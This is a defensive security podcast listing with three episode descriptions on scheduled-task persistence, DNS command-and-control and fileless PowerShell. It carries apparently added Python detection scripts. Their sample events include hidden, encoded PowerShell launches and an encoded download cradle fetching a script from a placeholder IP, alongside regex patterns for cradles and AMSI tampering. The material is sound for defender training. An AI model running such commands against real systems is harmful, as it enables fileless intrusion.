
CyberLex Blue Team Academy

Written by: M.G. Vance

About this listen

CyberLex Blue Team Academy is the cinematic, scenario-based podcast that teaches real-world defensive skills for Security+, ISC2 CC, CySA+, and CCSP. Learn to analyze threats, investigate incidents, and build the defensive intuition needed for modern cybersecurity roles. Your journey to becoming a defender starts here.
Episodes
  • Episode 10 — The Scheduled Task That Recreated Itself | Security Operations: Persistence & Automated Rebuild Loops
    Jan 2 2026

    EPISODE 10 — THE SCHEDULED TASK THAT RECREATED ITSELF

    Security+ Domain 4 concepts • CySA+ threat analytics • SOC persistence detection

    Persistence is one of the attacker’s most reliable advantages. And one of the stealthiest forms of persistence is a scheduled task that… won’t stay deleted.

    Defenders remove it. Minutes later, it reappears. Delete again. It returns again.

    This isn’t a misconfiguration. It’s a self-healing persistence loop: a second mechanism (another task, a WMI subscription, or a script already running in memory) watches for the task and recreates it, so deleting the task alone never removes the foothold.

    In this cinematic scenario, you’ll see how attackers build auto-rebuilding tasks, how fileless payloads hide in memory, and how SOC analysts investigate the subtle indicators surrounding persistence mechanisms.

    What you’ll learn:

    • How attackers create scheduled tasks that auto-rebuild

    • How fileless scripts persist in memory without touching disk

    • Why scheduled tasks are powerful detection points

    • How C2 frameworks use heartbeat-style DNS traffic

    • How to safely contain persistence mechanisms

    • How task creation logs reveal credential misuse

    • How real-world SOC teams escalate persistence findings
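    The hunt described above, as an added example that is not part of the episode or the author's material: it pairs task-deleted events with task-created events for the same task name, counts how often a task comes back shortly after a defender removes it, and checks whether the creating account is one that should be creating tasks at all (the credential-misuse angle). The records are constructed and only loosely modelled on Windows Security events 4698 (task created) and 4699 (task deleted); field layout, account names, task names and the rebuild window are assumptions.

```python
"""Hunt for scheduled tasks that get recreated after a defender deletes them.

Added example, not from the podcast. The records below are constructed and
modelled loosely on Windows Security events 4698 (task created) and 4699
(task deleted); field names, account names and task names are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (timestamp, event_id, subject account, task name, task action)
SAMPLE_EVENTS = [
    ("2026-01-02T09:00:00", 4698, "CORP\\svc-backup", "\\Microsoft\\Windows\\Updater",
     "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ("2026-01-02T09:12:00", 4699, "CORP\\analyst1", "\\Microsoft\\Windows\\Updater", ""),
    ("2026-01-02T09:14:00", 4698, "CORP\\svc-backup", "\\Microsoft\\Windows\\Updater",
     "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ("2026-01-02T09:30:00", 4699, "CORP\\analyst1", "\\Microsoft\\Windows\\Updater", ""),
    ("2026-01-02T09:31:30", 4698, "CORP\\svc-backup", "\\Microsoft\\Windows\\Updater",
     "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ("2026-01-02T10:00:00", 4698, "CORP\\sccm-admin", "\\Corp\\Inventory",
     "C:\\Program Files\\Corp\\inv.exe --collect"),
]

# Assumed baseline: accounts that legitimately create tasks in this environment.
EXPECTED_TASK_CREATORS = {"CORP\\sccm-admin", "NT AUTHORITY\\SYSTEM"}
REBUILD_WINDOW = timedelta(minutes=10)
SUSPICIOUS_ACTION_TOKENS = ("-enc", "-encodedcommand", "-w hidden", "-nop", "-noprofile")


def _ts(s):
    return datetime.fromisoformat(s)


def find_rebuild_loops(events, window=REBUILD_WINDOW):
    """Return {task_name: [(deleted_at, recreated_at, creator), ...]}.

    A rebuild is a 4698 for the same task name that follows a 4699 within
    `window`. Each deletion is paired with at most one recreation.
    """
    by_task = defaultdict(list)
    for ts, eid, subject, task, _action in sorted(events, key=lambda e: e[0]):
        by_task[task].append((_ts(ts), eid, subject))
    loops = {}
    for task, recs in by_task.items():
        pending_delete = None
        for ts, eid, subject in recs:
            if eid == 4699:
                pending_delete = ts
            elif eid == 4698 and pending_delete is not None:
                if ts - pending_delete <= window:
                    loops.setdefault(task, []).append((pending_delete, ts, subject))
                pending_delete = None
    return loops


def suspicious_action(action):
    """Flag task actions that look like hidden or encoded script launches."""
    a = action.lower()
    return any(tok in a for tok in SUSPICIOUS_ACTION_TOKENS)


def triage(events, expected_creators=EXPECTED_TASK_CREATORS):
    """Per task: rebuild count, whether an unexpected account created it,
    whether its action looks fileless, and an escalate decision."""
    loops = find_rebuild_loops(events)
    findings = {}
    for _ts_, eid, subject, task, action in events:
        if eid != 4698:
            continue
        f = findings.setdefault(task, {"rebuilds": 0, "creators": set(),
                                       "unexpected_creator": False,
                                       "suspicious_action": False})
        f["creators"].add(subject)
        f["unexpected_creator"] |= subject not in expected_creators
        f["suspicious_action"] |= suspicious_action(action)
    for task, f in findings.items():
        f["rebuilds"] = len(loops.get(task, []))
        # A task that comes back after deletion AND is created by the wrong
        # account or runs a hidden/encoded command is the rebuild-loop pattern.
        f["escalate"] = f["rebuilds"] >= 1 and (f["unexpected_creator"] or f["suspicious_action"])
    return findings


if __name__ == "__main__":
    for task, f in triage(SAMPLE_EVENTS).items():
        print(task, f)
```

    The point of the pairing logic is that a single 4698 is noise in most environments; a 4698 that lands minutes after a 4699 for the same name, from an account that never creates tasks, is the signal. Containment follows from the finding: isolate the host and hunt for whatever is doing the recreating (another task, a WMI event subscription, a running PowerShell process) rather than deleting the task a third time.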

    Security Operations Skills Covered:

    ✔ Automation & orchestration visibility

    ✔ Fileless execution & in-memory persistence

    ✔ Task scheduler abuse

    ✔ DNS-based command-and-control patterns

    ✔ Behavioral EDR/XDR investigation

    ✔ Incident response workflow for persistence

    ✔ Threat hunting signals


    This scenario reinforces key concepts from:

    Security+ (SY0-701) — Automation, persistence mechanisms, task scheduler abuse, detection & response

    CySA+ (CS0-003) — Behavioral analytics, fileless attack patterns, DNS-based C2, credential misuse

    Designed for exam learners and real SOC analysts.

    Ideal for:

    — Security+ learners

    — CySA+ learners

    — SOC Tier 1 analysts

    — Threat hunters

    — Blue team defenders

    — Anyone learning how persistence works in the real world

    Cinematic. Practical. Exam-relevant. This is how defenders recognize threats that refuse to disappear.

    New episodes weekly.

    Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

    Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

    CyberLex Learning — Forge the Defender.

    3 mins
  • Episode 9 — The DNS Query That Didn’t Match Any Pattern | Security Operations: DNS Analysis & C2 Detection
    Dec 26 2025

    EPISODE 9 — THE DNS QUERY THAT DIDN’T MATCH ANY PATTERN

    Security+ Domain 4 concepts • CySA+ network analytics • SOC DNS anomaly detection

    DNS is one of the most misunderstood — and most exploited — protocols in cybersecurity. Attackers use it for stealthy command-and-control, tunneling, and low-and-slow exfiltration because most environments treat DNS as “just infrastructure,” not a high-signal detection source.

    In this cinematic scenario, you’ll learn how a single strange DNS query becomes the clue that exposes a hidden attacker channel.

    What you’ll learn:

    • How DNS tunneling and C2 communication work

    • Why random or structured-looking domains signal early compromise

    • How SOC analysts correlate DNS telemetry with endpoint behavior

    • How attackers use domain generation algorithms (DGAs)

    • How unknown domains differ from known-malicious ones

    • How to isolate endpoints beaconing through DNS

    • How passive DNS and DPI support threat hunting
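    Two of the signals this episode lists, and the heartbeat-style DNS traffic mentioned in Episode 10, can be checked with a short script over a DNS query log. The following is an added example, not code from the podcast or its author: it looks for hosts querying one base domain at near-constant intervals (beaconing, where the changing subdomain label is the covert channel) and for second-level labels that look algorithmically generated (long, high entropy, almost no vowels). The log lines are constructed in an assumed format of timestamp, source IP and queried name, the thresholds are starting points to tune against your own baseline, and the registrable-domain split is a deliberate simplification that a real deployment would replace with the Public Suffix List.

```python
"""Spot DNS beaconing and DGA-like names in a query log.

Added example, not from the podcast. The log lines are constructed:
"<ISO timestamp> <source IP> <queried name>". Thresholds are assumptions a
SOC would tune against its own baseline.
"""
import math
import statistics
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2025-12-26T09:00:00 10.0.0.5 3a9f1c.updates-telemetry.net
2025-12-26T09:00:05 10.0.0.7 www.example.com
2025-12-26T09:00:07 10.0.0.7 www.example.com
2025-12-26T09:01:00 10.0.0.5 7b2e44.updates-telemetry.net
2025-12-26T09:02:00 10.0.0.7 mail.example.com
2025-12-26T09:02:01 10.0.0.5 c0ffee.updates-telemetry.net
2025-12-26T09:03:00 10.0.0.5 19d8a2.updates-telemetry.net
2025-12-26T09:04:00 10.0.0.5 e5b013.updates-telemetry.net
2025-12-26T09:05:10 10.0.0.9 xkq7wpd3zlr9.com
2025-12-26T09:05:11 10.0.0.9 m8vtqjkwzp4x.net
2025-12-26T09:05:12 10.0.0.9 rqz9xkvjtwp2.org
2025-12-26T09:17:40 10.0.0.7 www.example.com
2025-12-26T09:45:02 10.0.0.7 www.example.com
"""


def parse_log(text):
    records = []
    for line in text.splitlines():
        ts, src, qname = line.split()
        records.append((datetime.fromisoformat(ts), src, qname.lower().rstrip(".")))
    return records


def registrable_domain(qname):
    """Naive registrable domain: last two labels (real use: Public Suffix List)."""
    labels = qname.split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dga_like(qname, min_len=10, min_entropy=3.2, max_vowel_ratio=0.25):
    """Heuristic for algorithmically generated second-level labels:
    long, high character entropy and almost no vowels."""
    label = registrable_domain(qname).split(".")[0]
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio


def find_beacons(records, min_queries=4, max_cv=0.2):
    """Return {(src, domain): mean interval in seconds} for query series whose
    inter-arrival times are near constant (low coefficient of variation)."""
    series = defaultdict(list)
    for ts, src, qname in records:
        series[(src, registrable_domain(qname))].append(ts)
    beacons = {}
    for key, times in series.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            beacons[key] = mean
    return beacons


def find_dga_hosts(records):
    """Return {src: {registrable domains that look generated}}."""
    hosts = defaultdict(set)
    for _, src, qname in records:
        if dga_like(qname):
            hosts[src].add(registrable_domain(qname))
    return dict(hosts)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("beacons:", find_beacons(recs))
    print("dga hosts:", find_dga_hosts(recs))
```

    Note the two checks catch different things: 10.0.0.5 never queries a strange-looking domain, it simply asks about the same domain every sixty seconds with a fresh label each time, which is why interval regularity, not the name, is the detection. 10.0.0.9 queries each generated name once, so it only shows up through the name heuristic. Jittered beacons push the coefficient of variation up, so the max_cv value is the knob to widen, at the cost of more false positives from legitimate polling clients.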


    Security Operations Skills Covered:

    ✔ Network monitoring

    ✔ SIEM correlation

    ✔ DNS analysis

    ✔ Anomaly detection

    ✔ C2 discovery

    ✔ Incident response actions

    ✔ Threat hunting fundamentals

    This scenario reinforces key concepts from:

    Security+ (SY0-701) — Network monitoring, DNS analysis, anomaly detection

    CySA+ (CS0-003) — DNS-based threat detection, DGA identification, C2 behavior analytics

    Designed for exam learners and working defenders.


    Ideal for:

    — Security+ learners

    — CySA+ candidates

    — SOC Tier 1 analysts

    — Threat hunters

    — Anyone learning practical detection techniques


    This episode blends exam clarity with real-world intuition — teaching DNS detection the way defenders actually experience it.


    New episodes weekly.


    Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

    Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/


    CyberLex Learning — Forge the Defender.


    3 mins
  • Episode 8 — The Process That Hid in Memory | Security Operations: EDR Detection & Fileless Attacks
    Dec 19 2025

    EPISODE 8 — THE PROCESS THAT HID IN MEMORY

    Security+ Domain 4 concepts • CySA+ behavioral analytics • SOC fileless attack detection

    Modern attackers don’t always drop files. Sometimes the entire attack happens in memory: nothing for file-based antivirus to scan, no artifact on disk to hash, and only behavior left for the SOC to catch.

    In this cinematic scenario, you’ll see how defenders detect fileless techniques through subtle signals: unusual PowerShell behavior, reflective loading, credential access attempts, and processes that should never run the way they’re running.

    What you’ll learn:

    • How fileless attacks operate without touching disk

    • Why memory-only processes are early indicators of compromise

    • How EDR/XDR telemetry exposes reflective loading & AMSI bypass attempts

    • How attackers attempt credential access through LSASS

    • What suspicious PowerShell behavior looks like

    • How to isolate, contain, and escalate memory-resident threats
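    The signals in this list are what process telemetry, not file scanning, surfaces. The following is an added example, not code from the podcast or its author: it scores process-creation and process-access records the way an analyst triages EDR output, decoding a PowerShell -EncodedCommand so the download cradle hidden inside it becomes visible, flagging hidden-window and no-profile launches, Office parents, reflective-loading and AMSI strings, and any non-allowlisted process opening LSASS. The events are constructed dicts shaped only loosely like Sysmon Event 1 (process create) and Event 10 (process access); paths, PIDs, the allowlist and the access-mask values are assumptions.

```python
"""Score process telemetry for fileless PowerShell and LSASS access.

Added example, not from the podcast. Events are constructed dicts shaped
loosely like Sysmon Event 1 (process create) and Event 10 (process access);
paths, PIDs, the allowlist and the access masks are assumptions.
"""
import base64
import re


def _enc(script):
    """Build a PowerShell -EncodedCommand value (base64 of UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [
    {"event": 1, "pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s.ps1')")},
    {"event": 1, "pid": 4188,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\Get-DiskReport.ps1"},
    {"event": 10, "pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event": 10, "pid": 2204,
     "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
]

ENC_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
REFLECTIVE_RE = re.compile(r"reflection\.assembly\]::load|invoke-reflectivepeinjection|virtualalloc", re.I)
AMSI_RE = re.compile(r"amsiutils|amsiinitfailed|amsi\.dll", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
LSASS_ALLOWLIST = ("msmpeng.exe",)  # assumption: your own AV/EDR binaries go here


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return (score, reasons) for one telemetry record."""
    reasons = []
    if ev["event"] == 1:
        cmd = ev["command_line"]
        decoded = decode_encoded_command(cmd) or ""
        full = cmd + " " + decoded  # inspect the decoded script, not just the wrapper
        if decoded:
            reasons.append("encoded command")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            reasons.append("hidden window")
        if re.search(r"-nop\b|-noprofile", cmd, re.I):
            reasons.append("profile bypass")
        if CRADLE_RE.search(full):
            reasons.append("download cradle")
        if REFLECTIVE_RE.search(full):
            reasons.append("reflective loading")
        if AMSI_RE.search(full):
            reasons.append("AMSI tampering")
        if ev["parent_image"].lower().endswith(OFFICE_PARENTS):
            reasons.append("spawned by Office")
    elif ev["event"] == 10 and ev["target_image"].lower().endswith("lsass.exe"):
        if not ev["image"].lower().endswith(LSASS_ALLOWLIST):
            reasons.append(f"lsass access {ev['granted_access']} from non-allowlisted process")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Aggregate per PID so a suspicious launch and a later LSASS access
    from the same process reinforce each other."""
    per_pid = {}
    for ev in events:
        score, reasons = score_event(ev)
        entry = per_pid.setdefault(ev["pid"], {"score": 0, "reasons": []})
        entry["score"] += score
        entry["reasons"].extend(reasons)
    return {pid: e for pid, e in per_pid.items() if e["score"] >= threshold}


if __name__ == "__main__":
    for pid, e in triage(SAMPLE_EVENTS).items():
        print(pid, e["score"], e["reasons"])
```

    Decoding the encoded command is the step that matters most: the wrapper alone only says "encoded", while the decoded text shows the cradle fetching a script straight into memory, which is exactly the fileless pattern the episode describes. The allowlist for LSASS access exists because legitimate security products open LSASS constantly; without it the rule is noise.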

    Security Operations Skills Covered:

    ✔ EDR/XDR telemetry interpretation

    ✔ Memory analysis fundamentals

    ✔ Fileless malware techniques

    ✔ Behavioral & heuristic detection

    ✔ Credential theft monitoring

    ✔ Threat hunting signals

    ✔ Incident response workflow for in-memory attacks

    This scenario reinforces key concepts from:

    Security+ (SY0-701) — EDR/XDR, behavioral detection, malware identification, IR workflows

    CySA+ (CS0-003) — Memory-based attacks, credential access attempts, advanced detection analytics

    Designed to support both exam learners and working SOC analysts.


    Ideal for:

    — Security+ learners

    — CySA+ learners

    — SOC Tier 1 analysts

    — Blue team defenders

    — Incident responders

    — Anyone learning how modern attackers avoid traditional AV

    Short. Cinematic. Practical. A real-world look into attacks designed to stay invisible.

    New episodes weekly.


    Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

    Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

    CyberLex Learning — Forge the Defender.

    3 mins